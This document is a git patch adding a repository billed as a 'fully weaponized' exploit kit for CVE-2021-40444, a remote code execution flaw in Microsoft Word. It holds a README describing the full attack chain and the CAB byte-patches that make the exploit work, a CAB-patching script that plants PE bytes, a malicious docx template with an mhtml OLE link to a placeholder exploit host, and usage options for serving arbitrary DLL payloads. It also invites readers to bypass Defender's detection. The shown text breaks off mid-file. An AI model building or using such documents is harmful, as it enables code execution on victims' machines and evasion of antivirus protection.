From f2090f1d701284c2c51c754f8b512acc1c8700aa Mon Sep 17 00:00:00 2001
From: d3adc0de <klez.virus@gmail.com>
Date: Wed, 15 Sep 2021 23:40:51 +0100
Subject: [PATCH] First Release

---
 .gitignore                                 |   8 +
 README.md                                  |  98 +++++++++
 cab_parser.py                              | 210 +++++++++++++++++++
 data/word_dat/[Content_Types].xml          |   2 +
 data/word_dat/_rels/.rels                  |   2 +
 data/word_dat/docProps/app.xml             |   2 +
 data/word_dat/docProps/core.xml            |   2 +
 data/word_dat/word/_rels/document.xml.rels |   2 +
 data/word_dat/word/document.xml            |   2 +
 data/word_dat/word/fontTable.xml           |   2 +
 data/word_dat/word/settings.xml            |   2 +
 data/word_dat/word/styles.xml              |   2 +
 data/word_dat/word/theme/theme1.xml        |   2 +
 data/word_dat/word/webSettings.xml         |   2 +
 generator.py                               | 222 +++++++++++++++++++++
 template/original.html                     |   3 +
 template/sample2.html                      |  69 +++++++
 template/sample3.html                      | 146 ++++++++++++++
 18 files changed, 778 insertions(+)
 create mode 100644 .gitignore
 create mode 100644 README.md
 create mode 100644 cab_parser.py
 create mode 100644 data/word_dat/[Content_Types].xml
 create mode 100644 data/word_dat/_rels/.rels
 create mode 100644 data/word_dat/docProps/app.xml
 create mode 100644 data/word_dat/docProps/core.xml
 create mode 100644 data/word_dat/word/_rels/document.xml.rels
 create mode 100644 data/word_dat/word/document.xml
 create mode 100644 data/word_dat/word/fontTable.xml
 create mode 100644 data/word_dat/word/settings.xml
 create mode 100644 data/word_dat/word/styles.xml
 create mode 100644 data/word_dat/word/theme/theme1.xml
 create mode 100644 data/word_dat/word/webSettings.xml
 create mode 100644 generator.py
 create mode 100644 template/original.html
 create mode 100644 template/sample2.html
 create mode 100644 template/sample3.html

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..2e1d325
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,8 @@
+venv
+out
+test
+srv
+template/sample4-nw.html
+!srv/index.html
+.idea
+__pycache__
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..1cdc2be
--- /dev/null
+++ b/README.md
@@ -0,0 +1,98 @@
+# Fully Weaponized CVE-2021-40444
+
+Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution), works with arbitrary DLL files.
+
+# Background
+
+Although many PoC are already around the internet, I guessed to give myself a run to weaponizing this vulnerability,
+as what I found available lacked valuable information that it's worth sharing, also considering Microsoft already
+released a patch for this vulnerability.
+
+So far, the only valuable resources I've seen to create a fully working generator are:
+* [Blog by Ret2Pwn](https://xret2pwn.github.io//CVE-2021-40444-Analysis-and-Exploit/)
+* [Twit by j00sean](https://twitter.com/j00sean/status/1437390861499838466)
+
+The above resources outline a lot of the requirements needed to create a full chain. As I do not desire
+
+### Chain
+* Docx opened
+* Relationship stored in document.xml.rels points to malicious html
+* IE preview is launched to open the HTML link
+* JScript within the HTML contains an object pointing to a CAB file, and an iframe pointing to an INF file,
+  prefixed with the ".cpl:" directive
+* The cab file is opened, the INF file stored in the %TEMP%\Low directory
+* Due to a Path traversal (ZipSlip) vulnerability in the CAB, it's possible to store the INF in %TEMP%
+* Then, the INF file is opened with the ".cpl:" directive, causing the side-loading of the INF file via rundll32 
+  (if this is a DLL)
+
+### Overlooked Requirements
+
+There are quite a bit of overlooked requirements for this exploit to work, which caused even good PoCs, like
+[the one by lockedbyte](https://github.com/lockedbyte/CVE-2021-40444), to fail working properly.
+
+Maybe nobody explicitly "released" them to avoid the vulnerability to be exploited more. But now it's patched,
+so it should not cause a lot of troubles to release the details.
+
+#### CAB File
+
+The CAB file needs to be byte-patched to avoid extraction errors and to achieve the ZipSlip:
+* filename.inf should become ../filename.inf
+* filename.inf should be exactly <12-char>.inf
+* CFFOLDER.TypeCompress should be 0 (not compressed)
+* CFFOLDER.CoffCabStart should be increased by 3
+* CFFOLDER.cCfData: should be 2
+* CFFile.CbFile should be greater than the whole CFHeader CbCabinet
+* CFDATA.csum should be recalculated (or zeroed out)
+
+The reason for these constraints are many, and I didn't spend enough time to deeply understand all of them, but 
+let's see the most important:
+
+* TypeCompress: If the CAB is compressed, the trick to open it within an object file to trigger the INF write will fail
+* CoffCabStart: CoffCabStart gives the absolute position of the first CFDATA structure, as we added a '../', 
+  we would need to increase this by 3 to point to the file (this is more like a guess)
+* cCfData: As there is only 1 file, we should have just 1 CFDATA, I'm not too sure why this has to be set to 2
+* cbFile: Interestingly, if the CAB extraction concludes without any error, the INF file will be marked for deletion
+  by WORD, ruining the exploit. The only way to prevent this is to make WORD believe the extraction failed. If the
+  cbFile value is defined as greater than the cabinet file itself, the extractor will reach an EOF before reading
+  all the bytes defined in cbFile, raising an extraction error.
+* Last but not least, the csum value should be recalculated. Luckily, as noted by [j00sean](https://twitter.com/j00sean)
+  and according to [MS documentation](http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf), 
+  this value can be 0
+
+NOTE: Defender now detects the CAB file using the `_IMAGE_DOS_HEADER.e_magic` value as a signature, potentially avoiding
+PE files to be embedded in the CAB. Can this signature be bypassed? As observed before, this is a patched vulnerability, 
+so I'm not planning to release anything more complex than this. Up to the curious reader to develop this further.
+
+# CAB file parser
+
+The utility `cab_parser.py` can be used to see the headers of the exploit file, but don't consider this a full 
+parser. It's a very quick and dirty CAB header viewer I developed to understand what was going on.
+
+# Usage
+
+The generator is trivial to use, and has been tested with a number of different DLL payloads.
+
+```
+usage: generator.py [-h] -P PAYLOAD -u URL [-o OUTPUT] [--host] [-p LPORT] [-c COPY_TO]
+
+[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]
+
+optional arguments:
+  -h, --help            show this help message and exit
+  -P PAYLOAD, --payload PAYLOAD
+                        DLL payload to use for the exploit
+  -u URL, --url URL     Server URL for malicious references (CAB->INF)
+  -o OUTPUT, --output OUTPUT
+                        Output files basename (no extension)
+  --host                If set, will host the payload after creation
+  -p LPORT, --lport LPORT
+                        Port to use when hosting malicious payload
+  -c COPY_TO, --copy-to COPY_TO
+                        Copy payload to an alternate path
+```
+
+# Credits
+
+* [RET2_pwn](https://twitter.com/RET2_pwn) for the amazing blog
+* [j00sean](https://twitter.com/j00sean) for the good hints
+* [lockedbyte](https://github.com/lockedbyte/CVE-2021-40444) for the first decent poc
\ No newline at end of file
diff --git a/cab_parser.py b/cab_parser.py
new file mode 100644
index 0000000..474d83e
--- /dev/null
+++ b/cab_parser.py
@@ -0,0 +1,210 @@
+import sys
+from struct import pack, unpack
+
+
+class CabFormatError(Exception):
+    def __init__(self, msg):
+        super().__init__(msg)
+
+
+class PatchLengthError(Exception):
+    def __init__(self, msg):
+        super().__init__(msg)
+
+
+class Cab:
+    def __init__(self, data):
+        self.CFHEADER = CFHeader(data)
+        self.CFFOLDER = CFFolder(data)
+        self.CFFILE = CFFile(data)
+        self.CFFDATA = CFFData(data, start=self.CFFILE.end_offset)
+
+    @staticmethod
+    def seek_null(data, start=0, chunk_size=24):
+        chunk = data[start:start + chunk_size]
+        index = chunk.find(b"\x00")
+        return start + index if index > 0 else -1
+
+    def change_set_id(self, value: int):
+        self.CFHEADER.setID = value
+
+    def zero_out_signature(self):
+        self.CFFDATA.csum = 0
+
+    def change_coff_cab_start(self, value: int):
+        self.CFFOLDER.coffCabStart = value
+
+    def change_ccfdata_count(self, value: int):
+        self.CFFOLDER.cCFData = value
+
+    def change_cffile_cbfile(self, value: int):
+        self.CFFILE.cbFile = value
+
+    def make_file_read_only(self):
+        self.CFFILE.attribs |= 0x1
+        self.CFFILE.attribs |= 0x2
+        self.CFFILE.attribs |= 0x4
+
+    def change_bytes(self, offset, size, value):
+        if len(value) < size:
+            raise PatchLengthError
+        _bytes = bytearray(self.to_bytes())
+        _bytes[offset:offset + size] = value[:size]
+        return bytes(_bytes)
+
+    def to_string(self):
+        return rf"""
+CFHeader: {self.CFHEADER.to_string()}
+CFFolder: {self.CFFOLDER.to_string()}
+CFFile: {self.CFFILE.to_string()}
+CFFData: {self.CFFDATA.to_string()}
+        """
+
+    def to_bytes(self):
+        return self.CFHEADER.to_bytes() + self.CFFOLDER.to_bytes() + self.CFFILE.to_bytes() + self.CFFDATA.to_bytes()
+
+
+class CFHeader:
+    def __init__(self, data):
+        self.raw = data[:24]
+        self.signature_display = data[:4].decode()
+        self.signature = unpack("BBBB", data[:4])
+        if self.signature_display != "MSCF":
+            raise CabFormatError("Unknown signature")
+        self.reserved1 = unpack("<I", data[4:8])[0]
+        self.cbCabinet = unpack("<I", data[0x8:0xC])[0]
+        self.reserved2 = unpack("<I", data[0xC:0x10])[0]
+        self.coffFiles = unpack("<I", data[0x10:0x14])[0]
+        self.reserved3 = unpack("<I", data[0x14:0x18])[0]
+        self.versionMajor, self.versionMinor = unpack("BB", data[0x18:0x1A])
+        self.cFolders = unpack("H", data[0x1A:0x1C])[0]
+        self.cFiles = unpack("H", data[0x1C:0x1E])[0]
+        self.flags = unpack("H", data[0x1E:0x20])[0]
+        self.setID = unpack("H", data[0x20:0x22])[0]
+        self.iCabinet = unpack("H", data[0x22:0x24])[0]
+
+    def to_bytes(self):
+        _to_bytes = pack("BBBB", self.signature[0], self.signature[1], self.signature[2], self.signature[3])
+        _to_bytes += pack("<I", self.reserved1)
+        _to_bytes += pack("<I", self.cbCabinet)
+        _to_bytes += pack("<I", self.reserved2)
+        _to_bytes += pack("<I", self.coffFiles)
+        _to_bytes += pack("<I", self.reserved3)
+        _to_bytes += pack("B", self.versionMajor)
+        _to_bytes += pack("B", self.versionMinor)
+        _to_bytes += pack("H", self.cFolders)
+        _to_bytes += pack("H", self.cFiles)
+        _to_bytes += pack("H", self.flags)
+        _to_bytes += pack("H", self.setID)
+        _to_bytes += pack("H", self.iCabinet)
+        return _to_bytes
+
+    def to_string(self):
+        return rf"""
+    Signature: {self.signature_display}
+    Reserved1: {self.reserved1}
+    CbCabinet: {self.cbCabinet}
+    Reserved2: {self.reserved2}
+    CoffFiles: {self.coffFiles}
+    Reserved3: {self.reserved3}
+    Version: {self.versionMajor}.{self.versionMinor}
+    CFolders: {self.cFolders}
+    CFiles: {self.cFiles}
+    Flags: {self.flags}
+    SetID: {self.setID}
+    ICabinet: {self.iCabinet}
+        """
+
+
+class CFFolder:
+    def __init__(self, data):
+        self.raw = data[0x24:0x2B]
+        self.coffCabStart = unpack("<I", data[0x24:0x28])[0]
+        self.cCFData = unpack("H", data[0x28:0x2A])[0]
+        self.typeCompress = unpack("H", data[0x2A:0x2C])[0]
+
+    def to_bytes(self):
+        _to_bytes = pack("<I", self.coffCabStart)
+        _to_bytes += pack("H", self.cCFData)
+        _to_bytes += pack("H", self.typeCompress)
+        return _to_bytes
+
+    def to_string(self):
+        return rf"""
+    CoffCabStart: {self.coffCabStart}
+    CCFData: {self.cCFData}
+    TypeCompress: {self.typeCompress}
+            """
+
+
+class CFFile:
+    def __init__(self, data):
+        self.raw = data[0x2C:0x44]
+        self.cbFile = unpack("<I", data[0x2C:0x30])[0]
+        self.uoffFolderStart = unpack("<I", data[0x30:0x34])[0]
+        self.iFolder = unpack("H", data[0x34:0x36])[0]
+        self.date = unpack("H", data[0x36:0x38])[0]
+        self.time = unpack("H", data[0x38:0x3A])[0]
+        self.attribs = unpack("H", data[0x3A:0x3C])[0]
+        self.end_offset = Cab.seek_null(data, start=0x3C + 0x1, chunk_size=128) + 1
+        self.szName = data[0x3C:self.end_offset].decode()
+
+    def to_bytes(self):
+        _to_bytes = pack("<I", self.cbFile)
+        _to_bytes += pack("<I", self.uoffFolderStart)
+        _to_bytes += pack("H", self.iFolder)
+        _to_bytes += pack("H", self.date)
+        _to_bytes += pack("H", self.time)
+        _to_bytes += pack("H", self.attribs)
+        _to_bytes += self.szName.encode()
+        return _to_bytes
+
+    def to_string(self):
+        return rf"""
+    CbFile: {self.cbFile}
+    UoffFolderStart: {self.uoffFolderStart}
+    IFolder: {self.iFolder}
+    Date: {self.date}
+    Time: {self.time}
+    Attribs: {self.attribs}
+    SzName: {self.szName}
+            """
+
+
+class CFFData:
+    def __init__(self, data, start):
+        self.raw = data[start:]
+        self.csum = unpack("<I", data[start:start + 4])[0]
+        self.cbData = unpack("H", data[start + 4:start + 6])[0]
+        self.cbUncomp = unpack("H", data[start + 6:start + 8])[0]
+        self.ab_display = data[start + 8:start + 18] + data[-10:]
+        self.ab = self.raw[8:]
+
+    def to_bytes(self):
+        _to_bytes = pack("<I", self.csum)
+        _to_bytes += pack("H", self.cbData)
+        _to_bytes += pack("H", self.cbUncomp)
+        _to_bytes += self.raw[8:]
+        return _to_bytes
+
+    def to_string(self):
+        return rf"""
+    Checksum: {self.csum}
+    CbData: {self.cbData}
+    CbUncompressed: {self.cbUncomp}
+    Ab: {self.ab_display}
+        """
+
+
+def parse(file):
+    data = open(file, "rb").read()
+    cab = Cab(data=data)
+    print(cab.to_string())
+    new_cab = cab.change_bytes(offset=0x58, size=4, value=b"MZ\x90\x00")
+    print(Cab(new_cab).to_string())
+    with open(file, "wb") as out:
+        out.write(Cab(new_cab).to_bytes())
+
+
+if __name__ == "__main__":
+    parse(file=sys.argv[1])
diff --git a/data/word_dat/[Content_Types].xml b/data/word_dat/[Content_Types].xml
new file mode 100644
index 0000000..fde4e92
--- /dev/null
+++ b/data/word_dat/[Content_Types].xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
\ No newline at end of file
diff --git a/data/word_dat/_rels/.rels b/data/word_dat/_rels/.rels
new file mode 100644
index 0000000..32548d4
--- /dev/null
+++ b/data/word_dat/_rels/.rels
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
\ No newline at end of file
diff --git a/data/word_dat/docProps/app.xml b/data/word_dat/docProps/app.xml
new file mode 100644
index 0000000..961b67b
--- /dev/null
+++ b/data/word_dat/docProps/app.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal</Template><TotalTime>34</TotalTime><Pages>1</Pages><Words>206</Words><Characters>1176</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>9</Lines><Paragraphs>2</Paragraphs><ScaleCrop>false</ScaleCrop><Company>Consumers Association</Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>1380</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties>
\ No newline at end of file
diff --git a/data/word_dat/docProps/core.xml b/data/word_dat/docProps/core.xml
new file mode 100644
index 0000000..8f3b81b
--- /dev/null
+++ b/data/word_dat/docProps/core.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Microsoft</dc:creator><dc:description></dc:description><cp:lastModifiedBy>user</cp:lastModifiedBy><cp:revision>6</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2013-10-31T15:25:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-31T16:47:00Z</dcterms:modified><dc:language>en-US</dc:language></cp:coreProperties>
diff --git a/data/word_dat/word/_rels/document.xml.rels b/data/word_dat/word/_rels/document.xml.rels
new file mode 100644
index 0000000..2631d1e
--- /dev/null
+++ b/data/word_dat/word/_rels/document.xml.rels
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/></Relationships>
diff --git a/data/word_dat/word/document.xml b/data/word_dat/word/document.xml
new file mode 100644
index 0000000..4f0cec5
--- /dev/null
+++ b/data/word_dat/word/document.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14"><w:body><w:p w14:paraId="567F7079" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:sz w:val="24"/><w:szCs w:val="24"/><w:u w:val="single"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:noProof/><w:sz w:val="24"/><w:szCs w:val="24"/><w:u w:val="single"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:drawing><wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D47C28F" wp14:editId="74FFCD40"><wp:extent cx="1714500" cy="1714500"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:docPr id="1" name="Image1"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="1" name="Image1"/><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId4"/><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="1714500" cy="1714500"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:inline></w:drawing></w:r></w:p><w:p w14:paraId="720AA3DA" w14:textId="6089DC1A" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:sz w:val="30"/><w:szCs w:val="30"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:sz w:val="30"/><w:szCs w:val="30"/><w:u w:val="single"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:sz w:val="30"/><w:szCs w:val="30"/><w:u w:val="single"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:object w:dxaOrig="4320" w:dyaOrig="4320" w14:anchorId="0457A93C"><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"><v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/><v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:3.75pt;height:3.75pt" o:ole=""><v:imagedata r:id="rId5" o:title="" cropbottom="64444f" cropright="64444f"/></v:shape><o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId6" UpdateMode="OnCall"><o:LinkType>EnhancedMetaFile</o:LinkType><o:LockedField>false</o:LockedField><o:FieldCodes>\f 0</o:FieldCodes></o:OLEObject></w:object></w:r><w:bookmarkEnd w:id="0"/></w:p><w:p w14:paraId="1D3CD07E" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:color w:val="000000"/><w:sz w:val="28"/><w:szCs w:val="28"/><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:bCs/><w:color w:val="000000"/><w:sz w:val="28"/><w:szCs w:val="28"/><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:bCs/><w:color w:val="000000"/><w:sz w:val="28"/><w:szCs w:val="28"/><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:br/><w:t></w:t></w:r></w:p><w:p w14:paraId="411733A3" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t xml:space="preserve"></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="3224C118" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:color w:val="222222"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="47107722" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="5DB71CC8" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t> </w:t></w:r></w:p><w:p w14:paraId="54D7FECB" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New 